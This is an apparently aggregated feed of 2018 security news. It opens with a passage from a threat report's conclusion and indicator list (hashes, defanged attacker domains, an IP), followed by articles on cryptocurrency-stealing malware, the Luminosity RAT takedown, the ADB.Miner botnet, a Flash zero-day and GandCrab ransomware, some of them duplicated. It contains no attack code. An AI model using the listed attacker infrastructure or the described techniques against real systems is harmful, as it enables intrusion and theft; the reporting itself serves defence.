Conclusion


These campaigns show us that at least one threat actor is interested in and targeting the Middle East. Due to the nature of the decoy documents, we can conclude that the intended targets have an interest in the geopolitical context of the region. The attackers used an analysis report alleged to be written by Dar El-Jaleel, a Jordanian institute specialising in studies of the region. Some of these documents are tagged as confidential.

During the VBS Campaign, we were surprised by the level of OPSEC demonstrated by the attacker and their infrastructure. Legitimate service such as CloudFlare were used to hide malicious activities. Additionally the attacker used user-agent filtering and firewall rules in order to grant access to specific infected systems for only a few minutes in order to deliver shellcode. Following this, the server became unreachable. Another notable observation is the fact that the attacker was active only during the morning (Central European timezone) during our investigation.

The usage of script languages is an interesting approach from the attackers' point of view. These languages are natively available on Windows system, provide a high degree of flexibility, and can easily stay under the radar.

Coverage


Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as NGFW, NGIPS, and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IOCs


VBS Campaign:
Initial script: 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b
Domain #1: office-update[.]services
IP #2: 176[.]107[.]185[.]246

.NET Campaign:
Initial dropper: 4b03bea6817f0d5060a1beb8f6ec2297dc4358199d4d203ba18ddfcca9520b48
.NET #1: d49e9fdfdce1e93615c406ae13ac5f6f68fb7e321ed4f275f328ac8146dd0fc1
.NET #2: e66af059f37bdd35056d1bb6a1ba3695fc5ce333dc96b5a7d7cc9167e32571c5
Domain #1: jo[.]foxlove[.]life
Domain #2: eg[.]foxlove[.]life
Domain #3: fox[.]foxlove[.]life

Campaign #3:
Initial Dropper: af7a4f04435f9b6ba3d8905e4e67cfa19ec5c3c32e9d35937ec0546cce2dd1ff
Payload: 76a9b603f1f901020f65358f1cbf94c1a427d9019f004a99aa8bff1dea01a881
Domain: download[.]share2file[.]pro

Campaign #4:
Initial Dropper: 88e4f306f126ce4f2cd7941cb5d8fcd41bf7d6a54cf01b4a6a4057ed4810d2b6
Payload #1: c5bfb5118a999d21e9f445ad6ccb08eb71bc7bd4de9e88a41be9cf732156c525
Payload #2: 1176642841762b3bc1f401a5987dc55ae4b007367e98740188468642ffbd474e
Domain: update[.]share2file[.]pro

Japanese Teenager Arrested For Creating Cryptocurrency Stealing Malware

17-year-old arrested in Japan for developing malware that steals cryptocurrency wallet passwords

A 17-year-old school boy has been arrested by the Japanese police on suspicion of creating a computer virus that steals private keys (passwords) to wallets of cryptocurrency users, specifically targeting MonaCoin wallets.

For those unaware, MonaCoin (MONA) is a decentralized, open-source cryptocurrency launched in Japan in the year 2014. It is also advertised as “the first Japanese cryptocurrency,” and is currently ranked 88th on CoinMarketCap based on market value. At present, one MonaCoin is equivalent to almost $4 and 434 Yen.

The teenager, a third-year high school student in Kaizuka, Osaka Prefecture, was arrested on Tuesday (January 30, 2018) by Aichi Prefectural Police, for allegedly creating illegal electromagnetic records and using them, reports local Japanese news website Mainichi. He hid the malware app created by him inside an application for viewing cryptocurrency market data in real. But, in reality, the malware app stole passwords for Monacoin wallets.

According to the arrest warrant, the teenager had shared the trojanized app on an online bulletin board frequented by MonaCoin users on October 10th 2017 under the guise of helping them monitor cryptocurrency market prices. On questioning by the police, the teen defended himself by stating that “I didn’t do it with malicious intent.”

After the teen shared the malicious app online, it was immediately downloaded and installed by a 31-year-old man from Tokyo. Shortly after the installation, this man discovered that 170 MonaCoins (around $500) had gone missing from his wallet. While there were series of posts on the bulletin board warning others to be careful about the suspicious “software”, it was too late for the man by then.

The teenager whose name has not been revealed yet is under investigation for using the passwords to steal funds from victims. The police are also investigating if the teen targeted other unsuspecting users and whether he stole more funds or not, as they believe that the number of victims is likely much higher. However, no charges have been filed yet.

Recently, Coincheck, a Japan-based cryptocurrency exchange, was hit by the biggest hack in the history of cryptocurrency in which 58 billion Yen ($534 million) worth of the virtual currency “NEM (Nemu)” was stolen from its digital wallets.

The post Japanese Teenager Arrested For Creating Cryptocurrency Stealing Malware appeared first on TechWorm.

Crime ring linked to Luminosity RAT dismantled by an international law enforcement operation

The Europol’s European Cybercrime Centre along with the UK NSA disclosed the details of an international law enforcement operation that dismantled a crime ring linked to Luminosity RAT.

The Europol’s European Cybercrime Centre (EC3) along with the UK National Crime Agency (NCA) disclosed the details of an international law enforcement operation that targeted the criminal ecosystem around the Luminosity RAT (aka LuminosityLink).

According to the EC3, the joint operation was conducted in September 2017, it involved more than a dozen law enforcement agencies from Europe, the US, and Australia.

The Luminosity RAT was first spotted in 2015 but it became very popular in 2016.

The malware was offered for sale in the criminal underground for as little as $40, it allows attackers to take complete control over the infected system.

Luminosity RAT

In September 2016, the UK law enforcement arrested a man that was linked to the threat. The arrest triggered a new investigation that resulted in several arrests, search warrants, and cease and desist notifications across Europe, America, and Australia.

Law enforcement agencies target both sellers and users of Luminosity Trojan. According to the NCA, a small crime ring in the UK distributed Luminosity RAT to more than 8,600 buyers across 78 countries.

“The Luminosity Link RAT (a Remote Access Trojan) enabled hackers to connect to a victim’s machine undetected. They could then disable anti-virus and anti-malware software, carry out commands such as monitoring and recording keystrokes, steal data and passwords, and watch victims via their webcams.” states the press release published by NCA.

“The RAT cost as little as £30 and users needed little technical knowledge to deploy it.

A small network of UK individuals supported the distribution and use of the RAT across 78 countries and sold it to more than 8,600 buyers via a website dedicated to hacking and the use of criminal malware.”

The Luminosity RAT was one of the malicious code used in Business Email Compromise attacks and was also used Nigerian gangs in attacks aimed at industrial firms.

Law enforcement believes that thousands of individuals were infected with the RAT.

“Victims are believed to be in the thousands, with investigators having already identified evidence of stolen personal details, passwords, private photographs, video footage and data. Forensic analysis on the large number of computers and internet accounts seized continues.” reads the announcement published by the Europol.

“Through such strong, coordinated actions across national boundaries, criminals across the world are finding out that committing crimes remotely offers no protection from arrests. Nobody wants their personal details or photographs of loved ones to be stolen by criminals. We continue to urge everybody to ensure their operating systems and security software are up to date”. said Steven Wilson, Head of Europol’s European Cybercrime Centre.

 

Pierluigi Paganini

(Security Affairs – Luminosity RAT, cybercrime)

The post Crime ring linked to Luminosity RAT dismantled by an international law enforcement operation appeared first on Security Affairs.

E Hacking News – Latest Hacker News and IT Security News: A New Botnet Targeting to Infect Android Devices with Malware that Mines the Monero Cryptocurrency

Another botnet showed up over the weekend on Saturday, February 3 focused entirely on Android gadgets precisely being port 5555, which on gadgets running the Android OS is the port utilized by the operating system's native Android Debug Bridge (ADB), a troubleshooting interface which awards access to a portion of the operating system's most sensitive features.

The reason why being so that by checking for open troubleshoot ports it can infect victims with malware that mines the Monero cryptocurrency.

As per security researchers from Qihoo 360's Network Security Research Lab (Netlab) division, the ones who discovered the botnet, named ADB.miner , just gadgets, for example, cell phones, smart TVs, and television top boxes, running the Android OS have been tainted as of not long ago.

"The number of scan [sources] has doubled every 12 [hours]," said Yiming Gong, Director of the Network Security Research Lab at Qihoo 360. "We will see how big this botnet gets."


The botnet gives off an impression of being aggressive and continues growing every day, with 
infected devices filtering the Web for other victims. As of now, the Botnet seems to have infected around 7,400 devices as detected by Netlab.


Recently scanning for this port 5555, shot to the #4 spot in Netlab's most scanned ports as opposed to the previous account, as it wasn't even in the top 10.


Most IP addresses to checking for different devices (which means they are now infected) are situated in China (~40%) and South Korea (~30%). Yiming informed further that the botnet has generally infected  "television related" devices, instead of smartphones.
  
Netlab says ADB.miner utilized some of Mirai's port scanning code also marks the first time an Android malware strain has obtained code from Mirai, a strain of Linux-based malware that was previously focused on just systems administration i.e. Networking and IoT devices.

All the same, the researchers still haven't given any insights with respect to the ADB vulnerability  the attackers are using to take control over devices however cleared up that they don't think the bug is particular to a specific seller (vendor). This in all probability implies that the bug influences the centre of the Android ADB segment itself.



E Hacking News - Latest Hacker News and IT Security News

A New Botnet Targeting to Infect Android Devices with Malware that Mines the Monero Cryptocurrency

Another botnet showed up over the weekend on Saturday, February 3 focused entirely on Android gadgets precisely being port 5555, which on gadgets running the Android OS is the port utilized by the operating system's native Android Debug Bridge (ADB), a troubleshooting interface which awards access to a portion of the operating system's most sensitive features.

The reason why being so that by checking for open troubleshoot ports it can infect victims with malware that mines the Monero cryptocurrency.

As per security researchers from Qihoo 360's Network Security Research Lab (Netlab) division, the ones who discovered the botnet, named ADB.miner , just gadgets, for example, cell phones, smart TVs, and television top boxes, running the Android OS have been tainted as of not long ago.

"The number of scan [sources] has doubled every 12 [hours]," said Yiming Gong, Director of the Network Security Research Lab at Qihoo 360. "We will see how big this botnet gets."


The botnet gives off an impression of being aggressive and continues growing every day, with 
infected devices filtering the Web for other victims. As of now, the Botnet seems to have infected around 7,400 devices as detected by Netlab.


Recently scanning for this port 5555, shot to the #4 spot in Netlab's most scanned ports as opposed to the previous account, as it wasn't even in the top 10.


Most IP addresses to checking for different devices (which means they are now infected) are situated in China (~40%) and South Korea (~30%). Yiming informed further that the botnet has generally infected  "television related" devices, instead of smartphones.
  
Netlab says ADB.miner utilized some of Mirai's port scanning code also marks the first time an Android malware strain has obtained code from Mirai, a strain of Linux-based malware that was previously focused on just systems administration i.e. Networking and IoT devices.

All the same, the researchers still haven't given any insights with respect to the ADB vulnerability  the attackers are using to take control over devices however cleared up that they don't think the bug is particular to a specific seller (vendor). This in all probability implies that the bug influences the centre of the Android ADB segment itself.

January’s Top Cybersecurity News Stories: Jackpotting, Cryptocurrency Mining and Other Emerging Trends

Below is a roundup of the biggest cybersecurity news stories from the past month.

January is over, and it’s time for security professionals around the world to sweep up the confetti and start digging in on their New Year’s resolutions. During the first month of 2018, we saw everything from a CPU vulnerability to advanced Internet of Things (IoT) exploits, physical ATM attacks and new cybercriminal trends driven by the cryptocurrency gold rush.

Let’s take a closer look at how these stories are shaping the cybersecurity landscape as the industry gears up for another year of escalating threats.

Taking Stock of the Top Cybersecurity News Stories From January

On Jan. 9, a Ponemon Institute report titled “What CISOs Worry About in 2018” revealed that chief information security officers (CISOs) are less confident than ever about their susceptibility to cyber risks. According to the study, two-thirds of security leaders believe their organizations will suffer a cyberattack or data breach this year, and many fear that third-party partners will be the vulnerability point. In addition, 70 percent of CISOs cited lack of competent staff as their top challenge. Their concerns are understandable considering that cybercriminals stole $172 billion from 978 million consumers in 20 countries last year, according to Symantec.

January also saw an explosion of cryptomining attacks. In recent weeks, threat actors made off with $400 million worth of a digital currency by penetrating Japanese cryptocurrency exchange Coincheck. That news came just days after Ernst & Young estimated that nearly $400 million worth of funds raised in initial coin offerings had been lost or stolen. That’s more than 10 percent of the proceeds.

Cryptocurrency has become a playground for attackers, who have recognized that they can score bigger payoffs by turning users’ computers into nodes on a massive coin-mining network than they can by attacking users individually. In fact, SiliconANGLE reported that ransomware attacks are on the decline as criminals seek safer and more lucrative returns in mining.

One such attack has been ongoing for more than four months, affecting an estimated 30 million users around the globe. In most cases, victims don’t even know they’ve been compromised. Miners can use rogue JavaScript controls to hijack a system from an open browser window. Some attackers even buy their ads legitimately before replacing the contents with malicious code.

Top Exploits of 2018 So Far

In cybersecurity, there’s always something new to worry about. This month’s headache is jackpotting, a physical compromise scheme in which thieves hijack ATMs and force them to spit out cash. Brian Krebs first exposed the phenomenon, which encompasses a variety of techniques, such as using an endoscope — a device used by doctors to look inside the human body — to locate ports inside the machine where a crook can attach a cable that syncs with his or her laptop.

Voice-activated assistants have also found themselves squarely in cybercriminals’ crosshairs. According to Communications of the ACM, sound waves can be used to rewire circuits in IoT devices to deliver incorrect readings, cause control systems to malfunction or even execute commands using voice instructions hidden in music. Because the threats use analog media, they aren’t easily combated with digital protection.

Emerging Malware Trends

One thing that defines every January is predictions for the year ahead. What trends will define the security landscape in 2018? The IBM X-Force team has a few ideas.

  • Botnet attacks will become more frequent as cybercriminals exploit vulnerabilities in IoT devices. Last summer, a consortium of technology firms took down a botnet that compromised tens of thousands of Android devices using exploits in seemingly legitimate apps from the Google Play store. Any device can now potentially become a participant in a distributed denial-of-service attack (DDoS).
  • Failure to patch known vulnerabilities continues to be the primary culprit in large-scale attacks. Less than 1 percent of vulnerabilities in 2016 were considered zero-day, according to the IBM X-Force vulnerability database. Applying patches has never been more important.
  • Cloud services are presenting new attack vectors as misconfigured permissions or simple oversight leaves data exposed. Cloud databases leaked over 2 billion records in 2017, and the X-Force team asserted that server misconfigurations were responsible for 70 percent of them.
  • Thieves are increasingly extorting large ransoms for stolen high-value data. Victims in 2017 included a popular video streaming service from which preproduction versions of popular shows were stolen and several plastic surgery clinics whose photos of celebrity clients were held for ransom. With ransomware becoming a hit-or-miss proposition, attackers are focusing more on big money opportunities.
  • Phishing attacks will become more sophisticated as perpetrators use spear phishing to target individual victims, often spoofing their email accounts and writing style with personalized messages.
  • As noted above, cryptocurrency theft will soar with the growing value of blockchain-based digital money.

Risk Management Resolutions

Failure to patch is only one of the five epic security fails we outlined this month that put organizations at increased risk. Another is the tendency to become complacent once compliance is achieved on paper and neglect to update certifications and skills. A third major blunder is failure to centralize data security, which can impede efforts to keep up with the constantly shifting threat landscape.

Organizations that do not assign responsibility for data put themselves at even further risk. After all, if no one owns the data, no one is likely to protect it. Finally, failure to monitor data access enables cybercriminals to simply walk in through the front door, so to speak. It’s important to shut down access privileges immediately once an employee is terminated or otherwise leaves the company.

Consumers Warm Up to Security

IBM Security’s new “Future of Identity Study,” which surveyed nearly 4,000 adults from around the globe, revealed that consumers are beginning to prioritize security above convenience. Respondents ranked security as their top priority, over both convenience and privacy, when logging in to the majority of applications, especially apps dealing with money and financial transactions. The survey also found that biometrics are becoming mainstream, with 87 percent of consumers saying they’ll be comfortable with the technology in the future.

In addition, the study noted that although millennials have grown up with information technology, they aren’t as careful as their elders about passwords. Young people are less likely than other groups to use complex passwords and more likely to use the same password many times. However, they are also more inclined to use password managers and biometrics, which can help provide additional security layers without adding extra passwords to memorize.

Read the complete IBM Study on The Future of Identity

Gearing Up for Six More Weeks of Winter

With the new year in full swing, the start of February is an excellent time to take stock of the past month’s cybersecurity news headlines and trends, and gear up for whatever threats will emerge in the coming weeks. It’s a lot to take in at once, but awareness of the latest shifts in the threat landscape can go a long way toward helping enterprises and individual users steer clear of the cybercriminal flavor of the month.

The post January’s Top Cybersecurity News Stories: Jackpotting, Cryptocurrency Mining and Other Emerging Trends appeared first on Security Intelligence.

ADB.Miner, the Android mining botnet that targets devices with ADB interface open

Security researchers at Qihoo 360’s Netlab have spotted a new Android mining botnet that targets devices with ADB interface open.

Security researchers at Qihoo 360’s Netlab have spotted a new Android mining botnet over the weekend. The malicious code ADB.Miner targets Android devices by scanning for open ADB debugging interface (port 5555) and infects them with a Monero cryptocurrency miner.

The port 5555 is the working port ADB debug interface on Android device that should be shut down normally. The devices infected by ADB.miner are devices where users or vendors have voluntary enabled the debugging port 5555.

Spread of time : the earliest time of infection can be traced back to near January 31. This current wave of helminthic infections has been detected by our system from around 15:00 on the afternoon of 2018-02-03 and is still on the rise.” reads the analysis published by Netlab.

“Infected port : 5555, is the working port adb debug interface on Android device, the port should be shut down normally, but unknown part of the cause led to the wrong port opened.”

Starting from February 3, the expert noticed a rapid growth of the volume of scan traffic on port 5555 associated with the ADB.Miner:

ADB.Miner

Once the ADB.Miner has infected a device, the compromised system start scanning the Internet for other devices to infect.

According to the experts, ADB.miner borrowed the scanning code implemented by the Mirai botnet, this is the first time that the Mirai code is used by an Android threat.

The researchers did not reveal the way the malware infects the Android devices, it is likely it exploits a flaw in the ADB interface.

The number of infected devices is rapidly growing, according to different caliber statistics, there are 2.75 ~ 5.5k, and this figure is rapidly growing.

The two sources reported by Netlab are:

  • Statistics from scanmon : 2.75k, mainly from China (40%) and South Korea (31%).
  • Statistics from our botnet tracking system: 5.5k

At the time of writing the number of ADB.miner scans reached 75,900 unique IP addresses.

ADB.Miner traffic 2.png

Most IP addresses scanning the port 5555 are located in China (~40%) and South Korea (~30%).

The operators of the botnet are using the following Monero wallet address:

  • 44XT4KvmobTQfeWa6PCQF5RDosr2MLWm43AsaE3o5iNRXXTfDbYk2VPHTVedTQHZyfXNzMn8YYF2466d3FSDT7gJS8gdHAr

That still has not received the first payment for the mine.

Pierluigi Paganini 

(Security Affairs – Monero, ADB.Miner)

The post ADB.Miner, the Android mining botnet that targets devices with ADB interface open appeared first on Security Affairs.

The State of Security: 3 Types of Digital Threats to Look Out for at the 2018 Winter Olympics

9 February marks the commencement of the 2018 Winter Olympic Games in Pyeongchang, South Korea. Athletes from around the world will compete to achieve their lifelong dream of winning an Olympic medal. It’s a spectacle to behold, both online and in person. Digital attackers realize this; you can bet they will try and capitalize on […]… Read More

The post 3 Types of Digital Threats to Look Out for at the 2018 Winter Olympics appeared first on The State of Security.



The State of Security

3 Types of Digital Threats to Look Out for at the 2018 Winter Olympics

9 February marks the commencement of the 2018 Winter Olympic Games in Pyeongchang, South Korea. Athletes from around the world will compete to achieve their lifelong dream of winning an Olympic medal. It’s a spectacle to behold, both online and in person. Digital attackers realize this; you can bet they will try and capitalize on […]… Read More

The post 3 Types of Digital Threats to Look Out for at the 2018 Winter Olympics appeared first on The State of Security.

Mac crypto miner distributed via MacUpdate, other software download sites

Software download site/aggregator MacUpdate has been spotted delivering a new Mac crypto miner to users. A new Mac cryptominer was being distributed from hacked MacUpdate pages yesterday, disguised as Firefox, OnyX and Deeper.https://t.co/W8jcotFixl#macOS #Malware #CryptoMining — Thomas Reed (@thomasareed) February 2, 2018 A rare threat Stealthy cryptocurrency miners are most often aimed at Windows and browser users (e.g., the Coinhive script), but no one is safe: neither Linux users, nor Mac users, even though cryptocurrency-mining … More

Investigation uncovers Luminosity Link RAT distributors, victims are in the thousands

A hacking tool allowing cybercriminals to remotely gain complete control over a victim’s computer is no longer available as a result of an UK-led operation targeting hackers linked to the Remote Access Trojan (RAT) Luminosity Link. Coordinated by the UK National Crime Agency with the support of Europol, this operation saw the involvement of over a dozen law enforcement agencies in Europe, Australia and North America. Once installed upon a victim’s computer, a user of … More

Cisco and FireEye Pointing Finger at North Korea Hacking Group For Adobe Flash 0-Day In The Wild

According to security researchers at Cisco and FireEye a North Korea Hacking Group is behind the attacks that exploited the recently discovered Adobe Flash 0-Day vulnerability.

There have been over 1,000 Adobe Flash vulnerabilities since it was released. Designed to make website development easier and providing additional features not supported by standard web browsers, it also adds complexity and a much broader attack surface. Web browsers no longer support Flash by default, but users often re-enable it for convenience. And just having it installed on your system may be enough for this latest zero-day Adobe Player vulnerability to be exploited.

KISA, the South Korean CERT issued a security bulletin on January 31, 2018, warning of a “use-after-free” vulnerability in Adobe Flash Player being actively exploited in the wild. The following day, Adobe issued Security Advisory APSA18-01 confirming CVE-2018-4878 as a potential remote code vulnerability and announcing plans to release a security patch on February 5, 2018. The attack is carried out with a malicious SWF file embedded inside a Microsoft Office or Hancom Hangul document or spreadsheet. Once opened, the victim’s computer executes the malicious SWF through Adobe Flash if it is installed.

“Upon opening and successful exploitation, a decryption key for an encrypted embedded payload would be downloaded from compromised third-party websites hosted in South Korea,” according to FireEye.

The embedded payload is likely to be DOGCALL malware which facilitates the installation of ROKRAT command and control trojan which gives the remote attackers access to the victim’s system.

Experts warn that while waiting for the patch from Adobe on February 5th, users should be very cautious opening unexpected spreadsheets and document files. In reality, one should always be wary of any unexpected or suspicious document, especially ones that support embedding since they can hide all kinds of malware. You should also strongly consider uninstalling Adobe Flash. Even if it is disabled in your browser, having it installed on your system is enough for this latest exploit to execute successfully. Chances are you don’t need Adobe Flash any more. As explained by Sophos,

“The most common “need” we hear for Flash is to watch web videos, but almost all websites will use HTML5 for videos if you don’t have Flash. If you uninstall it, your browser will use its built-in video player instead – so you probably don’t need Flash after all.”

Cisco and FireEye have both been investigating, and warn that a North Korean group that they have been following for a while are likely behind this latest attack. Called TEMP.Reaper by FireEye and Group 123 by Cisco, the group with ties to North Korea was very active in 2017.

According to FireEye: “Historically, the majority of their targeting has been focused on the South Korean government, military, and defense industrial base; however, they have expanded to other international targets in the last year.”

In addition to expanding their targets, the hacking group appears to have been expanding its skills, utilizing a variety of different techniques to deploy destructive wiper malware and the command and control trojans.

There have been many hacking accusations pointed at North Korea in the past few years. With tensions rising in 2017 and the impending Olympics in South Korea this month there is a lot of opportunities and potential motivation for something significant. This latest attack shows that this hacking group is poised to take advantage of these opportunities.

As described by Cisco’s Talos security team, “Group 123 have now joined some of the criminal elite with this latest payload of ROKRAT. They have used an Adobe Flash 0 day which was outside of their previous capabilities – they did use exploits in previous campaigns but never a net new exploit as they have done now. This change represents a major shift in Group 123s maturity level, we can now confidentially assess Group 123 has a highly skilled, highly motivated and highly sophisticated group.”

About the author:  Steve Biswanger has over 20 years experience in Information Security consulting, and is a frequent speaker on risk, ICS and IoT topics. He is currently Director of Information Security for Encana, a North American oil & gas company and sits on the Board of Directors for the (ISC)2 Alberta Chapter.
 

Pierluigi Paganini

(Security Affairs – North Korea, cybercrime)

The post Cisco and FireEye Pointing Finger at North Korea Hacking Group For Adobe Flash 0-Day In The Wild appeared first on Security Affairs.

Security Affairs: Cisco and FireEye Pointing Finger at North Korea Hacking Group For Adobe Flash 0-Day In The Wild

According to security researchers at Cisco and FireEye a North Korea Hacking Group is behind the attacks that exploited the recently discovered Adobe Flash 0-Day vulnerability.

There have been over 1,000 Adobe Flash vulnerabilities since it was released. Designed to make website development easier and providing additional features not supported by standard web browsers, it also adds complexity and a much broader attack surface. Web browsers no longer support Flash by default, but users often re-enable it for convenience. And just having it installed on your system may be enough for this latest zero-day Adobe Player vulnerability to be exploited.

KISA, the South Korean CERT issued a security bulletin on January 31, 2018, warning of a “use-after-free” vulnerability in Adobe Flash Player being actively exploited in the wild. The following day, Adobe issued Security Advisory APSA18-01 confirming CVE-2018-4878 as a potential remote code vulnerability and announcing plans to release a security patch on February 5, 2018. The attack is carried out with a malicious SWF file embedded inside a Microsoft Office or Hancom Hangul document or spreadsheet. Once opened, the victim’s computer executes the malicious SWF through Adobe Flash if it is installed.

“Upon opening and successful exploitation, a decryption key for an encrypted embedded payload would be downloaded from compromised third-party websites hosted in South Korea,” according to FireEye.

The embedded payload is likely to be DOGCALL malware which facilitates the installation of ROKRAT command and control trojan which gives the remote attackers access to the victim’s system.

Experts warn that while waiting for the patch from Adobe on February 5th, users should be very cautious opening unexpected spreadsheets and document files. In reality, one should always be wary of any unexpected or suspicious document, especially ones that support embedding since they can hide all kinds of malware. You should also strongly consider uninstalling Adobe Flash. Even if it is disabled in your browser, having it installed on your system is enough for this latest exploit to execute successfully. Chances are you don’t need Adobe Flash any more. As explained by Sophos,

“The most common “need” we hear for Flash is to watch web videos, but almost all websites will use HTML5 for videos if you don’t have Flash. If you uninstall it, your browser will use its built-in video player instead – so you probably don’t need Flash after all.”

Cisco and FireEye have both been investigating, and warn that a North Korean group that they have been following for a while are likely behind this latest attack. Called TEMP.Reaper by FireEye and Group 123 by Cisco, the group with ties to North Korea was very active in 2017.

According to FireEye: “Historically, the majority of their targeting has been focused on the South Korean government, military, and defense industrial base; however, they have expanded to other international targets in the last year.”

In addition to expanding their targets, the hacking group appears to have been expanding its skills, utilizing a variety of different techniques to deploy destructive wiper malware and the command and control trojans.

There have been many hacking accusations pointed at North Korea in the past few years. With tensions rising in 2017 and the impending Olympics in South Korea this month there is a lot of opportunities and potential motivation for something significant. This latest attack shows that this hacking group is poised to take advantage of these opportunities.

As described by Cisco’s Talos security team, “Group 123 have now joined some of the criminal elite with this latest payload of ROKRAT. They have used an Adobe Flash 0 day which was outside of their previous capabilities – they did use exploits in previous campaigns but never a net new exploit as they have done now. This change represents a major shift in Group 123s maturity level, we can now confidentially assess Group 123 has a highly skilled, highly motivated and highly sophisticated group.”

About the author:  Steve Biswanger has over 20 years experience in Information Security consulting, and is a frequent speaker on risk, ICS and IoT topics. He is currently Director of Information Security for Encana, a North American oil & gas company and sits on the Board of Directors for the (ISC)2 Alberta Chapter.
 

Pierluigi Paganini

(Security Affairs – North Korea, cybercrime)

The post Cisco and FireEye Pointing Finger at North Korea Hacking Group For Adobe Flash 0-Day In The Wild appeared first on Security Affairs.



Security Affairs

Episode 82: the skinny on the Autosploit IoT hacking tool and a GDPR update from the front lines

In this week’s episode of The Security Ledger Podcast (#82), we take a look at Autosploit, the new Internet of Things attack tool that was published on the open source code repository Github last week. Brian Knopf of the firm Neustar joins us to talk about what the new tool might mean for attacks on Internet of Things endpoints in 2018....

Read the whole entry... »

Related Stories

Macro-less malware: The cyclical attack

Last year, attackers linked to the Russian hacking group APT28 (sometimes called Fancy Bear) started hacking like its 1999 with Microsoft Word-based malware that doesn’t trigger security warnings along the way. These types of attacks are called “macro-less malware” because they bypass the security warnings added to Microsoft Office programs in response to traditional macro malware like the Melissa virus at the end of the 20th century. In a November 2017 analysis, security giant McAfee … More

Cybersecurity week Round-Up (2018, Week 5)

Cybersecurity week Round-Up (2018, Week 5) -Let’s try to summarize the most important event occurred last week in 3 minutes.

The week began with massive cyber attacks against three Dutch banks and the National Tax Agency. Experts speculate the involvement of Russia because the attacks started after the revelation of the hack of the APT 28 group operated by the Dutch intelligence.

The wave of attacks against the cryptocurrency sector continues.
Security experts spotted two huge botnets and a malware specifically designed to mine cryptocurrency abusing victims’ resources.

The first mining botnet dubbed Smominru was discovered by researchers from Proofpoint. The malware uses the EternalBlue exploit to infect Windows computers and recruit them in Monero cryptocurrency mining activities.

The Smominru botnet has already infected more than half million systems.

It has been estimated that the botnet already mined 8,900 Monero ($2,346,271 at the current rate).

Researchers at Qihoo 360’s Netlab analyzed a new campaign powered by the DDG botnet, the second largest mining botnet of ever, that targets Redis and OrientDB servers. The miner has already infected nearly 4,400 servers and has mined over $925,000 worth of Monero since March 2017.

Researchers from security firm CrowdStrike spotted a new Monero crypto-mining worm dubbed WannaMine that spreads leveraging the NSA-linked EternalBlue exploit.

APT groups are even more dangerous. Iran-linked APT OilRig target IIS Web Servers with new RGDoor Backdoor. The backdoor was used in attacks against Middle Eastern government organizations and financial and educational institutions.

South Korea warns of Flash Zero-Day flaw exploited by North Korea in surgical attacks.

In the second part of the week, security experts from Bitdefender detailed the malware Operation PZChao that was attributed to the Chinese Iron Tiger APT.

One of the most clamorous cases of the weak is the data leak that involved military personnel data caused by the improper use of the Fitness Strava Application.
The data leak exposed information related to military bases worldwide, some of them were not publicly disclosed before.

The Meltdown and Spectre saga is going on.

Over the weekend Microsoft rolled out out-of-band updates to disable mitigations for Spectre v2 attacks to problems reported by its customers after the installation of the security patches.

While experts claim Intel reportedly alerted Chinese companies before US Government about Meltdown and Spectre flaws, malware researchers have spotted proof-of-concept malicious code that exploits Spectre and Meltdown flaws.

Researchers at security firm Radware have spotted a new IoT botnet, dubbed JenX, the leverages the Grand Theft Auto videogame community to infect devices.

Crooks target ATMs with Ploutus-D malware, these are the first confirmed cases of Jackpotting in US.

Pierluigi Paganini

(Security Affairs – cybersecurity, cyberweek)

The post Cybersecurity week Round-Up (2018, Week 5) appeared first on Security Affairs.

Security Affairs: GandCrab, a new ransomware-as-a-service emerges from Russian crime underground

Experts at cyber security firm LMNTRIX have discovered a new ransomware-as-a-service dubbed GandCrab. advertised in Russian hacking community on the dark web.

Experts at cyber security firm LMNTRIX have discovered a new ransomware-as-a-service in the dark web dubbed GandCrab.

GandCrab raas

The GandCrab was advertised in Russian hacking community, researchers noticed that authors leverage the RIG and GrandSoft exploit kits to distribute the malware.

“Over the last three days LMNTRIX Labs has been tracking an influx of GandCrab ransomware. The ransomware samples are being pushed by RIG Exploit delivery channels.” reads the analysis published by LMNTRIX.

GandCrab raas

As usually happen for Russian threat actors, members cannot use the ransomware to infect systems in countries in the former Soviet Republics that now comprise the Commonwealth of Independent States.

Below some interesting points from the advertisement:

  • Prospective buyers are asked to join the ‘partner program’, in which profits from the ransomware are split 60:40
  • Large’ partners are able to increase their percentage of proceeds to 70 per cent
  • As a Ransomware-as-a-service offering, technical support and updates are offered to ‘partners’
  • Partners are prohibited from targeting countries in the Commonwealth of Independent States (Azerbaijan, Armenia, Belarus, Kazakhstan, Kyrgyzstan, Moldova, Russia, Tajikistan, Turkmenistan, Uzbekistan and Ukraine) – violating this rule results in account deletion
  • Partners must apply to use the ransomware, and there is a limited amount of ‘seats’ available.” reads the translation of the ad.

The operators behind the RaaS offer they platform maintaining 40% of the ransom, the percentage is reduced to 30% for large partners.

Once infected, if the victim does not pay on time, he will have to pay a double ransom.

Other specific features related to GandCrab RaaS is the that it allows payment using the cryptocurrency Dash and the service is provided by a server hosted on a .bit domain.

The authors of the GandCrab RaaS also offers technical support and updates to its members, they also published a video tutorial that shows how the ransomware is able to avoid antivirus detection.

The RaaS implements a user-friendly admin console, which is accessible via Tor Network, to allow malware customization (i.e. ransom amount, individual bots and encryption masks)

The experts shared the Indicators of Compromise in their blog post.

 

Pierluigi Paganini

(Security Affairs – GandCrab RaaS, cybercrime)

The post GandCrab, a new ransomware-as-a-service emerges from Russian crime underground appeared first on Security Affairs.



Security Affairs

GandCrab, a new ransomware-as-a-service emerges from Russian crime underground

Experts at cyber security firm LMNTRIX have discovered a new ransomware-as-a-service dubbed GandCrab. advertised in Russian hacking community on the dark web.

Experts at cyber security firm LMNTRIX have discovered a new ransomware-as-a-service in the dark web dubbed GandCrab.

GandCrab raas

The GandCrab was advertised in Russian hacking community, researchers noticed that authors leverage the RIG and GrandSoft exploit kits to distribute the malware.

“Over the last three days LMNTRIX Labs has been tracking an influx of GandCrab ransomware. The ransomware samples are being pushed by RIG Exploit delivery channels.” reads the analysis published by LMNTRIX.

GandCrab raas

